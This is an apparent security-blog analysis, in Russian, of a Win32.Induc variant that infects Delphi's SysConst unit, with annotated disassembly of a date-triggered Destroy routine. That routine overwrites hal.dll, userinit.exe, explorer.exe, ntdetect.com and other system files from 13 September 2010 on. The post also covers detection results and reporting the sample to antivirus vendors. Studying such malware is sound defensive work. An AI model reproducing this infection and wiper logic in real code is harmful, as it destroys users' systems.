Win32.Induc возвращается
...
const
// Every constant below is a Delphi AnsiString literal as dumped from the .dcu:
// a 4-byte refcount of FF FF FF FF (-1 marks a compile-time constant), a 4-byte
// length, then the bytes and a terminating 00. The "яяяя" prefix in the text
// column is just those four FF bytes rendered in CP1251.
//
// File extensions and the "implementation" keyword. Presumably used to locate
// SysConst.pas/.dcu and the point in the unit where code is injected; the
// routine that consumes them is not in this excerpt -- TODO confirm.
dcu =
0: яяяя....dcu.|FF FF FF FF 03 00 00 00 64 63 75 00|;
pas =
0: яяяя....pas.|FF FF FF FF 03 00 00 00 70 61 73 00|;
imp =
00: яяяя....implemen|FF FF FF FF 0E 00 00 00 69 6D 70 6C 65 6D 65 6E|
10: tation. |74 61 74 69 6F 6E 00|;
// Classic Delphi 4-7 layout: registry key Software\Borland\Delphi\<version>,
// value "RootDir", and relative paths for the SysConst source, the compiled
// unit in \lib (trailing "." -- extension presumably appended) and dcc32.exe.
// DS5 ends with a quote and a space, i.e. it is a fragment of a command line.
DS1 =
00: яяяя....Software|FF FF FF FF 18 00 00 00 53 6F 66 74 77 61 72 65|
10: \Borland\Delphi\|5C 42 6F 72 6C 61 6E 64 5C 44 65 6C 70 68 69 5C|
20: . |00|;
DS2 =
00: яяяя....RootDir.|FF FF FF FF 07 00 00 00 52 6F 6F 74 44 69 72 00|;
DS3 =
00: яяяя....\source\|FF FF FF FF 18 00 00 00 5C 73 6F 75 72 63 65 5C|
10: rtl\sys\SysConst|72 74 6C 5C 73 79 73 5C 53 79 73 43 6F 6E 73 74|
20: . |00|;
DS4 =
00: яяяя....\lib\Sys|FF FF FF FF 0E 00 00 00 5C 6C 69 62 5C 53 79 73|
10: Const.. |43 6F 6E 73 74 2E 00|;
DS5 =
00: яяяя....\bin\dcc|FF FF FF FF 10 00 00 00 5C 62 69 6E 5C 64 63 63|
10: 32.exe" . |33 32 2E 65 78 65 22 20 00|;
// Version sub-keys appended to DS1 (Delphi 4.0 .. 7.0).
v40 =
0: яяяя....4.0.|FF FF FF FF 03 00 00 00 34 2E 30 00|;
v50 =
0: яяяя....5.0.|FF FF FF FF 03 00 00 00 35 2E 30 00|;
v60 =
0: яяяя....6.0.|FF FF FF FF 03 00 00 00 36 2E 30 00|;
v70 =
0: яяяя....7.0.|FF FF FF FF 03 00 00 00 37 2E 30 00|;
// A double quote (#$22).
apo = '"'{#$22};
// Payload strings. Both are used by Destroy as the MessageBox text and caption
// (see the PUSH order there); msgwr is also what the author reports being
// written into the emptied SysConst.pas.
msgwr =
00: яяяя"...Carpathi|FF FF FF FF 22 00 00 00 43 61 72 70 61 74 68 69|
10: an Forest CF1.0 |61 6E 20 46 6F 72 65 73 74 20 43 46 31 2E 30 20|
20: LiveUndead. |4C 69 76 65 55 6E 64 65 61 64 00|;
smsg =
00: яяяя....TODAY IS|FF FF FF FF 1B 00 00 00 54 4F 44 41 59 20 49 53|
10: A GOOD DAY TO D|20 41 20 47 4F 4F 44 20 44 41 59 20 54 4F 20 44|
20: IE.. |49 45 2E 00|;
// Files targeted by Destroy, relative to the Windows directory (hal .. ploha)
// plus one absolute path (sendfromagod). Their names are deliberately
// meaningless.
hal =
00: яяяя....system32|FF FF FF FF 10 00 00 00 73 79 73 74 65 6D 33 32|
10: \hal.dll. |5C 68 61 6C 2E 64 6C 6C 00|;
unm =
00: яяяя....system32|FF FF FF FF 13 00 00 00 73 79 73 74 65 6D 33 32|
10: \urlmon.dll. |5C 75 72 6C 6D 6F 6E 2E 64 6C 6C 00|;
inut =
00: яяяя....system32|FF FF FF FF 15 00 00 00 73 79 73 74 65 6D 33 32|
10: \userinit.exe. |5C 75 73 65 72 69 6E 69 74 2E 65 78 65 00|;
fsad =
00: яяяя....system32|FF FF FF FF 13 00 00 00 73 79 73 74 65 6D 33 32|
10: \logoff.exe. |5C 6C 6F 67 6F 66 66 2E 65 78 65 00|;
ghfg =
00: яяяя....system32|FF FF FF FF 15 00 00 00 73 79 73 74 65 6D 33 32|
10: \rasapi32.dll. |5C 72 61 73 61 70 69 33 32 2E 64 6C 6C 00|;
ploha =
00: яяяя....explorer|FF FF FF FF 0C 00 00 00 65 78 70 6C 6F 72 65 72|
10: .exe. |2E 65 78 65 00|;
sendfromagod =
00: яяяя....C:\ntdet|FF FF FF FF 0F 00 00 00 43 3A 5C 6E 74 64 65 74|
10: ect.com. |65 63 74 2E 63 6F 6D 00|;
// BDS-era layout (Delphi newer than 7): registry roots under Borland\BDS and
// CodeGear\BDS, with the RTL source under source\Win32\rtl\sys. This is the
// evidence that the infector handles post-Delphi-7 installs; the lookup code
// itself is not in this excerpt.
bih =
00: яяяя....HKLM\Sof|FF FF FF FF 1A 00 00 00 48 4B 4C 4D 5C 53 6F 66|
10: tware\Borland\BD|74 77 61 72 65 5C 42 6F 72 6C 61 6E 64 5C 42 44|
20: S\. |53 5C 00|;
sco =
00: яяяя....source\W|FF FF FF FF 1D 00 00 00 73 6F 75 72 63 65 5C 57|
10: in32\rtl\sys\Sys|69 6E 33 32 5C 72 74 6C 5C 73 79 73 5C 53 79 73|
20: Const. |43 6F 6E 73 74 00|;
cg =
00: яяяя....HKLM\Sof|FF FF FF FF 1B 00 00 00 48 4B 4C 4D 5C 53 6F 66|
10: tware\CodeGear\B|74 77 61 72 65 5C 43 6F 64 65 47 65 61 72 5C 42|
20: DS\. |44 53 5C 00|;
function A (s: System.AnsiString): System.AnsiString;
...
procedure B (s: System.AnsiString; d: System.AnsiString;
...
function C (T: System.PChar): System.AnsiString;
...
// Destructive payload, called from CheckDestroy once the date trigger fires.
// This is the disassembler's dump of the compiled procedure: offsets are
// relative to the start of Destroy, and "Destroy{0xC6}+N" are references into
// the string pool that follows the code (from 0x1AD on; see the note there).
// Behaviour visible in the code: build "<windir>\" from GetWindowsDirectory,
// call the module-local Rewrite on six files under system32, on explorer.exe
// and on C:\ntdetect.com, call the module-local Files, then show a MessageBox.
// Rewrite and Files are not RTL routines (no "@" prefix) and their bodies are
// not in this excerpt; "Rewrite" presumably truncates or overwrites the file,
// but that is inferred from the name -- TODO confirm against its body.
procedure Destroy;
var
// 256-byte buffer at EBP-260, filled by GetWindowsDirectory.
Windir: array[$0..$FF] of System.Char;
// Loop counter, kept in ESI.
i: System.Integer;
// Windows directory as an AnsiString, at EBP-4.
Winter: System.AnsiString;
// No instruction below reads or writes a slot for W; the "{W}" tags the
// disassembler attached to EBP are its own guess at a symbol, not a real use.
W: Windows.DWORD;
begin
00000000 : // -- Line #234 --
// Prologue: 284 bytes of locals (six temporary AnsiStrings at EBP-284..EBP-264,
// Windir at EBP-260, Winter at EBP-4), all string slots zeroed, then a
// try/finally frame whose handler is at Destroy+416 (= 0x1A0 below).
00000000 : 55 PUSH EBP{W}
00000001 : 8B EC MOV EBP{W},ESP
00000003 : 81 C4 E4 FE FF FF ADD ESP,$FFFFFEE4
00000009 : 53 PUSH EBX
0000000A : 56 PUSH ESI
0000000B : 33 C0 XOR EAX,EAX
0000000D : 89 85 E4 FE FF FF MOV DWORD PTR [EBP-284],EAX
00000013 : 89 85 E8 FE FF FF MOV DWORD PTR [EBP-280],EAX
00000019 : 89 85 EC FE FF FF MOV DWORD PTR [EBP-276],EAX
0000001F : 89 85 F0 FE FF FF MOV DWORD PTR [EBP-272],EAX
00000025 : 89 85 F4 FE FF FF MOV DWORD PTR [EBP-268],EAX
0000002B : 89 85 F8 FE FF FF MOV DWORD PTR [EBP-264],EAX
00000031 : 89 45 FC MOV DWORD PTR [EBP-4{Winter}],EAX
00000034 : 33 C0 XOR EAX,EAX
00000036 : 55 PUSH EBP{W}
00000037 : 68(A0 01 00 00 PUSH Destroy{0xC6}+416
0000003C : 64 FF 30 PUSH DWORD PTR FS:[EAX]
0000003F : 64 89 20 MOV DWORD PTR FS:[EAX],ESP
00000000 : // -- Line #235 --
// FillChar(Windir, $100, 0): EAX = @Windir, EDX = count, ECX = fill byte.
00000042 : 8D 85 FC FE FF FF LEA EAX,DWORD PTR [EBP-260]
00000048 : 33 C9 XOR ECX,ECX
0000004A : BA 00 01 00 00 MOV EDX,$00000100
0000004F : E8(00 00 00 00 CALL @FillChar{0x2A}
00000000 : // -- Line #236 --
// GetWindowsDirectory(Windir, $FF). The return value (length) is ignored.
00000054 : 68 FF 00 00 00 PUSH $000000FF
00000059 : 8D 85 FC FE FF FF LEA EAX,DWORD PTR [EBP-260]
0000005F : 50 PUSH EAX
00000060 : E8(00 00 00 00 CALL GetWindowsDirectory{0x65}
00000000 : // -- Line #237 --
// for i := 0 to 255 do Winter[i] := Windir[i]  -- copies the whole 256-byte
// buffer, trailing zero bytes included, one byte per iteration.
00000065 : 33 F6 XOR ESI,ESI
00000067 : 8D 9D FC FE FF FF LEA EBX,DWORD PTR [EBP-260]
00000000 : // -- Line #238 --
// NOTE(review): Winter is still the empty string here (zeroed at EBP-4 in the
// prologue and never assigned since), and the store below goes to
// [EAX+i-1], i.e. Winter[0] on the first pass. Indexing an empty AnsiString
// is an out-of-range write, so whether this procedure actually survives to the
// Rewrite calls should be confirmed in a debugger rather than assumed from the
// strings it carries. Depends on what @UniqueStringA returns for an empty
// string, which is not shown here.
0000006D : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
00000070 : E8(00 00 00 00 CALL @UniqueStringA{0xB}
00000075 : 8A 13 MOV DL,BYTE PTR [EBX]
00000077 : 88 54 30 FF MOV BYTE PTR [EAX+ESI{i}-1],DL
0000007B : 46 INC ESI{i}
0000007C : 43 INC EBX
00000000 : // -- Line #237 --
0000007D : 81 FE 00 01 00 00 CMP ESI{i},$00000100
00000083 : 75 E8 JNE -24; (0x6D)
00000000 : // -- Line #239 --
// if Winter[Length(Winter)] <> '\' then Winter := Winter + '\'
// (Destroy+440 = 0x1B8 is the one-character string "\").
00000085 : 8B 45 FC MOV EAX,DWORD PTR [EBP-4{Winter}]
00000088 : E8(00 00 00 00 CALL @LStrLen{0x8}
0000008D : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
00000090 : 80 7C 02 FF 5C CMP BYTE PTR [EDX+EAX-1],$5C
00000095 : 74 0D JE +13; (0xA4)
00000000 : // -- Line #240 --
00000097 : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
0000009A : BA(B8 01 00 00 MOV EDX,Destroy{0xC6}+440
0000009F : E8(00 00 00 00 CALL @LStrCat{0x34}
00000000 : // -- Line #241 --
// Rewrite(Winter + 'system32\hal.dll')   (Destroy+452 = 0x1C4). Each of the
// next six statements follows the same pattern: @LStrCat3 builds the path into
// a temporary at EBP-264..EBP-284, then the module-local Rewrite gets it in EAX.
000000A4 : 8D 85 F8 FE FF FF LEA EAX,DWORD PTR [EBP-264]
000000AA : B9(C4 01 00 00 MOV ECX,Destroy{0xC6}+452
000000AF : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000B2 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000B7 : 8B 85 F8 FE FF FF MOV EAX,DWORD PTR [EBP-264]
000000BD : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #242 --
// Rewrite(Winter + 'system32\urlmon.dll')   (Destroy+480 = 0x1E0)
000000C2 : 8D 85 F4 FE FF FF LEA EAX,DWORD PTR [EBP-268]
000000C8 : B9(E0 01 00 00 MOV ECX,Destroy{0xC6}+480
000000CD : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000D0 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000D5 : 8B 85 F4 FE FF FF MOV EAX,DWORD PTR [EBP-268]
000000DB : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #243 --
// Rewrite(Winter + 'system32\userinit.exe')   (Destroy+508 = 0x1FC)
000000E0 : 8D 85 F0 FE FF FF LEA EAX,DWORD PTR [EBP-272]
000000E6 : B9(FC 01 00 00 MOV ECX,Destroy{0xC6}+508
000000EB : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
000000EE : E8(00 00 00 00 CALL @LStrCat3{0x2D}
000000F3 : 8B 85 F0 FE FF FF MOV EAX,DWORD PTR [EBP-272]
000000F9 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #244 --
// Rewrite(Winter + 'system32\logoff.exe')   (Destroy+540 = 0x21C)
000000FE : 8D 85 EC FE FF FF LEA EAX,DWORD PTR [EBP-276]
00000104 : B9(1C 02 00 00 MOV ECX,Destroy{0xC6}+540
00000109 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
0000010C : E8(00 00 00 00 CALL @LStrCat3{0x2D}
00000111 : 8B 85 EC FE FF FF MOV EAX,DWORD PTR [EBP-276]
00000117 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #245 --
// Rewrite(Winter + 'system32\rasapi32.dll')   (Destroy+568 = 0x238)
0000011C : 8D 85 E8 FE FF FF LEA EAX,DWORD PTR [EBP-280]
00000122 : B9(38 02 00 00 MOV ECX,Destroy{0xC6}+568
00000127 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
0000012A : E8(00 00 00 00 CALL @LStrCat3{0x2D}
0000012F : 8B 85 E8 FE FF FF MOV EAX,DWORD PTR [EBP-280]
00000135 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #246 --
// Rewrite(Winter + 'explorer.exe')   (Destroy+600 = 0x258; note: Windows
// directory itself, not system32)
0000013A : 8D 85 E4 FE FF FF LEA EAX,DWORD PTR [EBP-284]
00000140 : B9(58 02 00 00 MOV ECX,Destroy{0xC6}+600
00000145 : 8B 55 FC MOV EDX,DWORD PTR [EBP-4{Winter}]
00000148 : E8(00 00 00 00 CALL @LStrCat3{0x2D}
0000014D : 8B 85 E4 FE FF FF MOV EAX,DWORD PTR [EBP-284]
00000153 : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #247 --
// Rewrite('C:\ntdetect.com')   (Destroy+624 = 0x270) -- absolute path passed
// directly, without the Winter prefix.
00000158 : B8(70 02 00 00 MOV EAX,Destroy{0xC6}+624
0000015D : E8(00 00 00 00 CALL Rewrite{0xB9}
00000000 : // -- Line #248 --
// Files -- module-local, takes no arguments here; body not in this excerpt.
00000162 : E8(00 00 00 00 CALL Files{0xC4}
00000000 : // -- Line #249 --
// MessageBox(0, lpText, lpCaption, 0). stdcall pushes right to left, so
// Destroy+640 (0x280, "TODAY IS A GOOD DAY TO DIE.") is the caption and
// Destroy+668 (0x29C, "Carpathian Forest CF1.0 LiveUndead") is the text.
00000167 : 6A 00 PUSH $00
00000169 : 68(80 02 00 00 PUSH Destroy{0xC6}+640
0000016E : 68(9C 02 00 00 PUSH Destroy{0xC6}+668
00000173 : 6A 00 PUSH $00
00000175 : E8(00 00 00 00 CALL MessageBox{0x66}
// Normal exit from the try body: unlink the frame, then fall into the finally
// block with Destroy+423 (= 0x1A7, the epilogue) as the return address.
0000017A : 33 C0 XOR EAX,EAX
0000017C : 5A POP EDX
0000017D : 59 POP ECX
0000017E : 59 POP ECX
0000017F : 64 89 10 MOV DWORD PTR FS:[EAX],EDX
00000182 : 68(A7 01 00 00 PUSH Destroy{0xC6}+423
// finally: release the six temporaries (@LStrArrayClr, count 6) and Winter.
00000187 : 8D 85 E4 FE FF FF LEA EAX,DWORD PTR [EBP-284]
0000018D : BA 06 00 00 00 MOV EDX,$00000006
00000192 : E8(00 00 00 00 CALL @LStrArrayClr{0x30}
00000197 : 8D 45 FC LEA EAX,DWORD PTR [EBP-4{Winter}]
0000019A : E8(00 00 00 00 CALL @LStrClr{0xE}
0000019F : C3 RET NEAR
// Exception path (handler registered at Destroy+416): run the RTL finally
// handler, then the same cleanup.
000001A0 : E9(00 00 00 00 JMP @HandleFinally{0xF}
000001A5 : EB E0 JMP -32; (0x187)
00000000 : // -- Line #250 --
// Epilogue (Destroy+423).
000001A7 : 5E POP ESI
000001A8 : 5B POP EBX
000001A9 : 8B E5 MOV ESP,EBP{W}
000001AB : 5D POP EBP{W}
000001AC : C3 RET NEAR
// From here on this is DATA, not code: the string pool referenced above, which
// the disassembler decoded as instructions. It is never executed. Layout
// (AnsiString headers FF FF FF FF + length precede each entry):
//   0x1B8 "\"                        0x1C4 "system32\hal.dll"
//   0x1E0 "system32\urlmon.dll"      0x1FC "system32\userinit.exe"
//   0x21C "system32\logoff.exe"      0x238 "system32\rasapi32.dll"
//   0x258 "explorer.exe"             0x270 "C:\ntdetect.com"
//   0x280 "TODAY IS A GOOD DAY TO DIE."   0x29C "Carpathian Forest CF1.0 LiveUndead"
// The last two are bare null-terminated PChar literals (no AnsiString header),
// matching their use as MessageBox arguments.
000001AD : 00 00 ADD BYTE PTR [EAX],AL
000001AF : 00 FF ADD BH,BH
000001B1 : FF FF ? EDI
000001B3 : FF 01 INC DWORD PTR [ECX]
000001B5 : 00 00 ADD BYTE PTR [EAX],AL
000001B7 : 00 5C 00 00 ADD BYTE PTR [EAX+EAX0],BL
000001BB : 00 FF ADD BH,BH
000001BD : FF FF ? EDI
000001BF : FF 10 CALL DWORD PTR [EAX],NEAR
000001C1 : 00 00 ADD BYTE PTR [EAX],AL
000001C3 : 00 73 79 ADD BYTE PTR [EBX+121],DH
000001C6 : 73 74 JNB +116; (0x23C)
000001C8 : 65 6D INSW
000001CA : 33 32 XOR ESI,DWORD PTR [EDX]
000001CC : 5C POP ESP
000001CD : 68 61 6C 2E 64 PUSH $642E6C61
000001D2 : 6C INSB
000001D3 : 6C INSB
000001D4 : 00 00 ADD BYTE PTR [EAX],AL
000001D6 : 00 00 ADD BYTE PTR [EAX],AL
000001D8 : FF FF ? EDI
000001DA : FF FF ? EDI
000001DC : 13 00 ADC EAX,DWORD PTR [EAX]
000001DE : 00 00 ADD BYTE PTR [EAX],AL
000001E0 : 73 79 JNB +121; (0x25B)
000001E2 : 73 74 JNB +116; (0x258)
000001E4 : 65 6D INSW
000001E6 : 33 32 XOR ESI,DWORD PTR [EDX]
000001E8 : 5C POP ESP
000001E9 : 75 72 JNE +114; (0x25D)
000001EB : 6C INSB
000001EC : 6D INSW
000001ED : 6F OUTSW
000001EE : 6E OUTSB
000001EF : 2E 64 6C INSB
000001F2 : 6C INSB
000001F3 : 00 FF ADD BH,BH
000001F5 : FF FF ? EDI
000001F7 : FF 15 00 00 00 73 CALL DWORD PTR [$73000000],NEAR
000001FD : 79 73 JNS +115; (0x272)
000001FF : 74 65 JE +101; (0x266)
00000201 : 6D INSW
00000202 : 33 32 XOR ESI,DWORD PTR [EDX]
00000204 : 5C POP ESP
00000205 : 75 73 JNE +115; (0x27A)
00000207 : 65 72 69 JB +105; (0x273)
0000020A : 6E OUTSB
0000020B : 69 74 2E 65 78 65 00 00 IMUL DWORD PTR [ESI+EBP{W}+101],$00006578
00000213 : 00 FF ADD BH,BH
00000215 : FF FF ? EDI
00000217 : FF 13 CALL DWORD PTR [EBX],NEAR
00000219 : 00 00 ADD BYTE PTR [EAX],AL
0000021B : 00 73 79 ADD BYTE PTR [EBX+121],DH
0000021E : 73 74 JNB +116; (0x294)
00000220 : 65 6D INSW
00000222 : 33 32 XOR ESI,DWORD PTR [EDX]
00000224 : 5C POP ESP
00000225 : 6C INSB
00000226 : 6F OUTSW
00000227 : 67 6F OUTSW
00000229 : 66 66 2E 65 78 65 JS +101; (0x294)
0000022F : 00 FF ADD BH,BH
00000231 : FF FF ? EDI
00000233 : FF 15 00 00 00 73 CALL DWORD PTR [$73000000],NEAR
00000239 : 79 73 JNS +115; (0x2AE)
0000023B : 74 65 JE +101; (0x2A2)
0000023D : 6D INSW
0000023E : 33 32 XOR ESI,DWORD PTR [EDX]
00000240 : 5C POP ESP
00000241 : 72 61 JB +97; (0x2A4)
00000243 : 73 61 JNB +97; (0x2A6)
00000245 : 70 69 JO +105; (0x2B0)
00000247 : 33 32 XOR ESI,DWORD PTR [EDX]
00000249 : 2E 64 6C INSB
0000024C : 6C INSB
0000024D : 00 00 ADD BYTE PTR [EAX],AL
0000024F : 00 FF ADD BH,BH
00000251 : FF FF ? EDI
00000253 : FF 0C 00 DEC DWORD PTR [EAX+EAX]
00000256 : 00 00 ADD BYTE PTR [EAX],AL
00000258 : 65 78 70 JS +112; (0x2CB)
0000025B : 6C INSB
0000025C : 6F OUTSW
0000025D : 72 65 JB +101; (0x2C4)
0000025F : 72 2E JB +46; (0x28F)
00000261 : 65 78 65 JS +101; (0x2C9)
00000264 : 00 00 ADD BYTE PTR [EAX],AL
00000266 : 00 00 ADD BYTE PTR [EAX],AL
00000268 : FF FF ? EDI
0000026A : FF FF ? EDI
0000026C : 0F 00 00 SLDT WORD PTR [EAX]
0000026F : 00 43 3A ADD BYTE PTR [EBX+58],AL
00000272 : 5C POP ESP
00000273 : 6E OUTSB
00000274 : 74 64 JE +100; (0x2DA)
00000276 : 65 74 65 JE +101; (0x2DE)
00000279 : 63 ARPL
0000027A : 74 2E JE +46; (0x2AA)
0000027C : 63 ARPL
0000027D : 6F OUTSW
0000027E : 6D INSW
0000027F : 00 54 4F 44 ADD BYTE PTR [EDI+2*ECX+68],DL
00000283 : 41 INC ECX
00000284 : 59 POP ECX
00000285 : 20 49 53 AND BYTE PTR [ECX+83],CL
00000288 : 20 41 20 AND BYTE PTR [ECX+32],AL
0000028B : 47 INC EDI
0000028C : 4F DEC EDI
0000028D : 4F DEC EDI
0000028E : 44 INC ESP
0000028F : 20 44 41 59 AND BYTE PTR [ECX+2*EAX+89],AL
00000293 : 20 54 4F 20 AND BYTE PTR [EDI+2*ECX+32],DL
00000297 : 44 INC ESP
00000298 : 49 DEC ECX
00000299 : 45 INC EBP{W}
0000029A : 2E 00 43 61 ADD BYTE PTR CS:[EBX+97],AL
0000029E : 72 70 JB +112; (0x310)
000002A0 : 61 POPA
000002A1 : 74 68 JE +104; (0x30B)
000002A3 : 69 61 6E 20 46 6F 72 IMUL DWORD PTR [ECX+110],$726F4620
000002AA : 65 73 74 JNB +116; (0x321)
000002AD : 20 43 46 AND BYTE PTR [EBX+70],AL
000002B0 : 31 2E XOR DWORD PTR [ESI],EBP{W}
000002B2 : 30 20 XOR BYTE PTR [EAX],AH
000002B4 : 4C DEC ESP
000002B5 : 69 76 65 55 6E 64 65 IMUL DWORD PTR [ESI+101],$65646E55
000002BC : 61 POPA
000002BD : 64 00 00 ADD BYTE PTR FS:[EAX],AL
end;
...
// Date trigger for the payload. Reads the current system time into a
// SYSTEMTIME on the stack and calls Destroy when the date is on or after
// 2010-09-13, i.e. when
//   wYear > 2010, or
//   wYear = 2010 and wMonth > 9, or
//   wYear = 2010 and wMonth = 9 and wDay >= 13.
// Offsets follow the SYSTEMTIME layout: wYear at +0, wMonth at +2, wDay at +6
// (+4 is wDayOfWeek and is not examined). The three branches are mutually
// exclusive, so Destroy runs at most once per call. All comparisons are
// unsigned WORD compares. Note the trigger is a floor, not a single day: any
// later date also fires.
procedure CheckDestroy;
var
// Filled by GetSystemTime; 16 bytes reserved at ESP.
W: Windows._SYSTEMTIME;
begin
00000000 : // -- Line #616 --
00000000 : 83 C4 F0 ADD ESP,-16
00000000 : // -- Line #617 --
// GetSystemTime(@W)
00000003 : 54 PUSH ESP
00000004 : E8(00 00 00 00 CALL GetSystemTime{0x74}
00000000 : // -- Line #618 --
// if W.wYear > 2010 ($07DA) then Destroy
00000009 : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
0000000F : 76 05 JBE +5; (0x16)
00000000 : // -- Line #619 --
00000011 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #621 --
// if (W.wYear = 2010) and (W.wMonth > 9) then Destroy
00000016 : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
0000001C : 75 0D JNE +13; (0x2B)
00000000 : // -- Line #622 --
0000001E : 66 83 7C 24 02 09 CMP WORD PTR [ESP+2],9
00000024 : 76 05 JBE +5; (0x2B)
00000000 : // -- Line #623 --
00000026 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #625 --
// if (W.wYear = 2010) and (W.wMonth = 9) and (W.wDay >= 13) then Destroy
0000002B : 66 81 3C 24 DA 07 CMP WORD PTR [ESP],$07DA
00000031 : 75 15 JNE +21; (0x48)
00000000 : // -- Line #626 --
00000033 : 66 83 7C 24 02 09 CMP WORD PTR [ESP+2],9
00000039 : 75 0D JNE +13; (0x48)
00000000 : // -- Line #627 --
0000003B : 66 83 7C 24 06 0D CMP WORD PTR [ESP+6],13
00000041 : 72 05 JB +5; (0x48)
00000000 : // -- Line #628 --
00000043 : E8(00 00 00 00 CALL Destroy{0xC6}
00000000 : // -- Line #629 --
// Release the SYSTEMTIME slot and return.
00000048 : 83 C4 10 ADD ESP,16
0000004B : C3 RET NEAR
end;
...
end.
Ну и всё это дело действительно разбавлено некоторым количеством старых антиотладочных трюков, которые якобы и реализуют весь «полезный» функционал модуля.
Узнаёте? Win32.Induc, но уже с деструктивной нагрузкой и, судя по константам bih/cg/sco (ветки реестра HKLM\Software\Borland\BDS\ и HKLM\Software\CodeGear\BDS\, путь source\Win32\rtl\sys\SysConst), поддерживающий и версии Delphi новее 7. Запустил в песочнице: при инициализации модуля он дописывает вредоносный код в SysConst.pas, компилирует его в SysConst.dcu, содержимое исходного файла затирает и пишет туда "Carpathian Forest CF1.0 LiveUndead". Начиная с 13 сентября 2010 года (CheckDestroy сравнивает wYear/wMonth/wDay с 2010/9/13 и срабатывает при любой дате не раньше этой, а не только в этот день) программа, собранная на заражённой машине, покажет MessageBox с заголовком "TODAY IS A GOOD DAY TO DIE." и грохнет систему: Destroy прогоняет через модульную процедуру Rewrite файлы %windir%\system32\hal.dll, urlmon.dll, userinit.exe, logoff.exe, rasapi32.dll, %windir%\explorer.exe и C:\ntdetect.com. Оговорка: цикл `Winter[i] := Windir[i]` в Destroy выполняется над ещё пустой строкой Winter, так что работоспособность нагрузки стоит проверить отладчиком, а не только по строкам в дампе.
На 03.03.10 модуль почти никем не детектится (макафи эвристикой видит подозрительный файл), заражённые программы — почти так же (икарус — Win32.Banload, CAT-QuickHeal молодца — W32.Induc.A).
Такие дела. Отправил семпл докторвебу и касперскому, подождём официальных комментариев.